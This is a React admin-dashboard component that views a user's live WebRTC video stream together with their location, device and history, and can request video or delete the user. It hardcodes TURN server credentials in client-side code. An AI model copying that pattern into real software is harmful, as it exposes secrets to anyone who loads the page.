import { Component } from "react"

/* Components */
import { Layout } from "../components"

/* Widgets */
import History from "./History"
import Video from "./Video"

/* Modal */
import Modal from "react-modal"

/* JWT */
import { decodeToken } from "react-jwt"

/* REST API */
import { view } from "../api/Dashboard"
import { remove } from "../api/User"

/* Sweet alert */
import Swal from "sweetalert2"

/* Constants */
import { utils } from "../constants"

/* Moment */
import moment from "moment"
import "moment/locale/ru"

/* Moment Settings */
moment.locale("ru")


/* Ice Servers */
const ICE_SERVERS = [
    { urls: "stun:stun.l.google.com:19302" },
    { urls: "stun:flint-backend.cuba-go.com:3478" },
    {
        urls: "turns:flint-backend.cuba-go.com:5349?transport=tcp",
        username: "flint",
        credential: "supersecret123"
    }
]


/* Widget Stream */
class Stream extends Component {

    constructor() {
        super()

        this.state = {
            visible: false,
            token: null,

            status: "loading",
            data: null,
            remote: null,
            paused: false,

            remoteConnection: false,
            iceCandidates: [],

            second: 0
        }

        this.pc = null
        this.timer = null
    }

    /* Open Action */
    open = token => {

        /* Check ID */
        if (!token) {
            return
        }

        /* Save in state */
        this.setState({ visible: true, token }, () => {

            /* Load Token */
            this.load()

        })
    }

    /* Load */
    load = (reload = false) => {

        /* Fields */
        const { token } = this.state
        const { socket } = this.props

        if (reload) {
            this.setState({ status: "loading" })
        }

        /* Close Peer Connection */
        if (this.pc) {
            this.pc.close()
            this.pc = null
        }

        /* Clear Timer */
        if (this.timer) {
            clearInterval(this.timer)
            this.timer = null
        }

        /* Remove Socket Listeners */
        socket.off("user-offer")
        socket.off("user-ice-candidate")

        /* Send to REST API */
        view({ token }).then(response => {
            if (response.status === 200) {

                this.setState({ status: "ok", data: response.data }, () => {
                    if (this._history) this._history.load(true)
                })

                /* Register Socket Events */
                this.socketEvents()

                /* Register Peer Connection Events */
                this.peerConnectionEvents()

            }
            else {
                this.setState({ status: "error", data: null })
            }
        }).catch(() => {
            this.setState({ status: "network", data: null })
        })

    }

    /* Close */
    close = () => {

        /* Fields */
        const { socket } = this.props

        /* Close Modal */
        this.setState({
            visible: false, token: null, status: "loading", data: null, remote: null, paused: false, second: 0
        })

        /* Close Peer Connection */
        if (this.pc) {
            this.pc.close()
            this.pc = null
        }

        /* Clear Timer */
        if (this.timer) {
            clearInterval(this.timer)
            this.timer = null
        }

        /* Remove Socket Listeners */
        socket.off("user-offer")
        socket.off("user-ice-candidate")
    }

    /* Get ID */
    getID = () => {

        /* Fields */
        const { token } = this.state

        /* Check */
        if (!token) {
            return
        }

        /* Get Token */
        const _token = localStorage.getItem("token")

        /* Decoded */
        const decoded = decodeToken(_token)

        /* Admin Token */
        const final = `${decoded.token}:${token}`

        return final
    }

    /* Peer Connection Events */
    peerConnectionEvents = () => {

        /* Fields */
        const { socket } = this.props
        const id = this.getID()

        /* Peer Connection */
        this.pc = new RTCPeerConnection({ iceServers: ICE_SERVERS })

        /* On Track */
        this.pc.ontrack = event => {
            if (event.streams && event.streams[0]) {
                document.getElementById("remoteVideo").srcObject = event.streams[0]
                this.setState({ remote: event.streams[0] })
            }
        }

        /* Ice Candidate */
        this.pc.onicecandidate = event => {
            if (event.candidate) {
                socket.emit("manager-ice-candidate", { id, candidate: event.candidate })
            }
        }

        /* Ice State */
        this.pc.oniceconnectionstatechange = () => {
            if (this.pc.iceConnectionState) {

            }
        }


        /* Timer */
        this.timer = setInterval(() => {

            /* Fields */
            const { remote } = this.state

            /* Remote */
            if (!remote) {
                return
            }

            /* Get Tracks */
            const videoTracks = remote.getVideoTracks() || []
            const active = videoTracks.some(t => t.readyState === "live")

            this.setState({ paused: !active })

        }, 2000)
    }

    /* Socket Events */
    socketEvents = () => {

        /* Fields */
        const { socket } = this.props
        const id = this.getID()

        /* Remove existing listeners before re-registering */
        socket.off("user-offer")
        socket.off("user-ice-candidate")
        socket.off("endVideo")
        socket.off("userSecond")
        socket.off("dashboard-connection-update")
        socket.off("dashboard-stream-update")

        /* Emit New Connection */
        socket.emit("manager-new-connection", { id })

        /* Offer */
        socket.on("user-offer", ({ offer }) => {
            this.handleOffer(offer)
        })

        /* Ice Candidate */
        socket.on("user-ice-candidate", ({ candidate }) => {
            this.handleIceCandidate(candidate)
        })

        /* On End Video */
        socket.on("endVideo", data => {

            /* Fields */
            const { token } = this.state

            /* Check Token */
            if (token === data.token && this._history) {
                this._history.load()
            }

        })

        /* On Get Second */
        socket.on("userSecond", data => {

            /* Fields */
            const { token } = this.state

            /* Check Token */
            if (token === data.token && this._history) {
                this.setState({ second: data.second })
            }

        })

        /* Connection Status */
        socket.on("dashboard-connection-update", ({ token, status }) => {

            /* Fields */
            const { data } = this.state

            /* Check Index */
            if (data && data.token === token) {
                data.connection = status
                this.setState({ data })
            }

        })


        /* Stream Status */
        socket.on("dashboard-stream-update", ({ token, status }) => {

            /* Fields */
            const { data } = this.state

            /* Check Index */
            if (data && data.token === token) {

                data.stream = status
                this.setState({ data })

                /* Close Peer Connection */
                if (this.pc) {
                    this.pc.close()
                    this.pc = null
                }

                /* Clear Timer */
                if (this.timer) {
                    clearInterval(this.timer)
                    this.timer = null
                }

                /* Remove Socket Listeners */
                socket.off("user-offer")
                socket.off("user-ice-candidate")

                /* Reconnect */
                if (status === 1) {

                    /* Register Socket Events */
                    this.socketEvents()

                    /* Register Peer Connection Events */
                    this.peerConnectionEvents()

                }
            }

        })

    }

    /* Handle Offer */
    handleOffer = async offer => {

        /* Fields */
        const { iceCandidates } = this.state
        const { socket } = this.props
        const id = this.getID()

        /* Set Remote Description */
        await this.pc.setRemoteDescription(new RTCSessionDescription(offer))

        /* Enable Remote Connection */
        this.setState({ remoteConnection: true })

        /* Add Ice Candidates */
        if (iceCandidates.length > 0) {

            /* Start Cycle */
            for (const candidate of iceCandidates) {
                await this.pc.addIceCandidate(new RTCIceCandidate(candidate))
            }

            this.setState({ iceCandidates: [] })
        }

        /* Create Answer */
        const answer = await this.pc.createAnswer()

        /* Set Local Description */
        await this.pc.setLocalDescription(answer)

        /* Emit Answer */
        socket.emit("manager-answer", { id, answer })
    }



    /* Handle ICE Candidate */
    handleIceCandidate = async candidate => {

        /* Fields */
        const { remoteConnection, iceCandidates } = this.state

        if (remoteConnection) {
            await this.pc.addIceCandidate(new RTCIceCandidate(candidate))
        }
        else {
            iceCandidates.push(candidate)
            this.setState({ iceCandidates })
        }

    }


    /* Remove Action */
    remove = () => {

        /* Fields */
        const { token } = this.state
        const { socket, reload } = this.props

        /* Swal Container */
        Swal.fire({
            title: "Удалить пользователя?",
            text: "Вы действительно хотите удалить?",
            icon: "warning",
            showCancelButton: true,
            confirmButtonColor: "#f44336",
            reverseButtons: true,
            confirmButtonText: "Удалить",
            cancelButtonText: "Отмена"
        }).then(result => {
            if (result.isConfirmed) {

                /* Send to REST API */
                remove({ token }).then(response => {
                    if (response.status === 200) {
                        Swal.fire({
                            html: `<p class="notification">Пользователь удалена!</p>`,
                            icon: "success",
                            color: "white",
                            background: "black",
                            showConfirmButton: false,
                            position: "top-right",
                            timer: 2000,
                            width: 400,
                            backdrop: false,
                            customClass: { icon: "notification-icon", htmlContainer: "notification-html", popup: "notification-popup" }
                        })

                        /* Emit Removed User */
                        socket.emit("removed-user", { token })

                        /* Clear timing */
                        const timer = setTimeout(() => {
                            this.close()
                            clearTimeout(timer)
                        }, 200)

                        /* Reload */
                        reload()
                    }
                    else {

                        Swal.fire({
                            html: `<p class="notification">Что-то пошло не так! Попробуйте позднее.</p>`,
                            icon: "error",
                            color: "white",
                            background: "black",
                            showConfirmButton: false,
                            position: "top-right",
                            timer: 2000,
                            width: 400,
                            backdrop: false,
                            customClass: { icon: "notification-icon", htmlContainer: "notification-html", popup: "notification-popup" }
                        })

                    }
                }).catch(() => {
                    Swal.fire({
                        html: `<p class="notification">Что-то пошло не так! Попробуйте позднее.</p>`,
                        icon: "error",
                        color: "white",
                        background: "black",
                        showConfirmButton: false,
                        position: "top-right",
                        timer: 2000,
                        width: 400,
                        backdrop: false,
                        customClass: { icon: "notification-icon", htmlContainer: "notification-html", popup: "notification-popup" }
                    })
                })

            }
        })

    }


    /* Cup Video Emit */
    cupVideo = () => {

        /* Fields */
        const { socket } = this.props
        const { data } = this.state

        /* Emit */
        socket.emit("adminCup", { id: data.id, token: data.token })

    }

    /* Draw Stream */
    _stream = () => {

        /* Fields */
        const { data, paused, second } = this.state

        return (
            <div className="stream-container">

                <div className="stream-container-header">
                    <div className="stream-container-name">{data.name}</div>
                    <div className="stream-container-header-left">
                        <div className="stream-container-second">{utils.formatTime(second)}</div>
                        {data.stream === 1 && <div onClick={() => this.cupVideo()} className="stream-container-button">Получить видео</div>}
                    </div>
                </div>

                <div className="stream-container-bottom">
                    <div className="stream-container-city">
                        <img src="/images/pin.png" alt="Pin" />
                        <span>{utils.check(data.country)} {utils.check(data.city)}</span>
                    </div>
                    <div className="stream-container-phone">
                        <img src="/images/phone.png" alt="Phone" />
                        <span>{utils.check(data.device, "-")}</span>
                    </div>
                </div>

                <div className="stream-container-video">

                    <div className="stream-container-head">
                        {data.connection === 1 ? <div className="stream-container-connection green">Онлайн</div> : <div className="stream-container-connection red">Офлайн</div>}
                        {data.stream === 1 && <div className="stream-container-stream">live</div>}
                    </div>

                    <video id="remoteVideo" autoPlay muted playsInline controls />

                    {paused && <div className="stream-paused">Видео на паузе</div>}

                </div>

                <div onClick={() => this.remove()} className="stream-remove-user">Удалить пользователя</div>

            </div>
        )
    }


    /* Draw Content */
    _content = () => {

        /* Fields */
        const { status, token } = this.state

        /* Layout */
        if (status !== "ok") {
            return <Layout status={status} reload={() => this.load(true)} mode="light" />
        }

        return (
            <div className="stream-content">

                {/* Draw Stream */}
                {this._stream()}

                {/* Draw History */}
                <History token={token} ref={ref => this._history = ref} open={data => this._video.open(data)} />

            </div>
        )
    }


    render = () => {

        /* Fields */
        const { visible } = this.state

        return (
            <Modal
                isOpen={visible}
                onRequestClose={() => this.close()}
                className="stream-modal"
                overlayClassName="stream-overlay"
                closeTimeoutMS={200}
            >

                {/* Draw Header */}
                <div className="stream-header">
                    <div className="stream-header-inner">
                        <h2>Просмотр</h2>
                        <div onClick={() => this.load(true)} className="stream-reload-button">Обновить</div>
                    </div>
                    <div onClick={() => this.close()} className="stream-close">
                        <img src="/images/close.png" alt="Close" />
                    </div>
                </div>

                {/* Draw Content */}
                {this._content()}

                {/* Draw Video */}
                <Video ref={ref => this._video = ref} />

            </Modal>
        )
    }
}

export default Stream